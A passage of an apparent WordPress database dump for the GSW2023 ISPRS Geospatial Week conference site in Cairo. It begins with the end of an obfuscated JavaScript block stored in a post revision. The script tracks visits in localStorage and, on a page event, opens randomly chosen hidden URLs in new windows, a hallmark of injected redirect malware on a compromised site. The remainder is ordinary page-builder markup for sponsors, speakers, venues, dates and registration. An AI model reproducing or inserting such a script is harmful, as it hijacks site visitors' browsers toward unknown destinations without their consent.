_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 13:48:47','2023-06-09 13:48:47','',3066,'https://gsw2023.com/?p=4644',0,'revision','',0),
(4645,1,'2023-06-09 13:50:13','2023-06-09 13:50:13','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1685791591251{margin-top: 260px !important;}\"]</p>\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-2271\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png\" alt=\"\" width=\"105\" height=\"104\" /></p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong>Prof. Ismail AbdelGhafar</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></p>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791357227{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><strong><img class=\"alignnone wp-image-4613\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/dr-alaa.jpg\" alt=\"\" width=\"80\" height=\"106\" /></strong></span></h4>\n<div class=\"aio-icon-header\">\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Prof. Dr. Alaa A. Abdelbary</strong></span></h4>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-6189 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Chairman of the local organizing committee GSW2023, Egypt</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Vice President for Postgraduates Studies and Scientific Research</strong></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 8pt;\"><strong>Arab Academy for Science, Technology&amp; Maritime Transport</strong></span></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1685791546373{margin-top: 220px !important;}\"]</p>\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<div class=\"aio-icon-header\">\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\"><img class=\"alignnone wp-image-2272\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg\" alt=\"\" width=\"106\" height=\"106\" /></span></h4>\n<h4 class=\"aio-icon-title ult-responsive\" style=\"text-align: center;\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-title\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;desktop:22px;&quot;,&quot;line-height&quot;:&quot;desktop:32px;&quot;}\"><span style=\"font-size: 14pt;\">Prof. Naser El-Sheimy</span></h4>\n</div>\n</div>\n<div class=\"aio-icon-description ult-responsive\" data-ultimate-target=\"#Info-box-wrap-9929 .aio-icon-description\" data-responsive-json-new=\"{&quot;font-size&quot;:&quot;&quot;,&quot;line-height&quot;:&quot;&quot;}\">\n<p style=\"text-align: center;\"><strong>Geospatial Week Director ,The University of Calgary</strong></p>\n</div>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317489572{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1686318421309{margin-top: -75px !important;}\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your name (as it appears in your passport), passport number and nationality.</strong></span></p>\n<ul>\n<li><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to<span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></span></li>\n</ul>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: 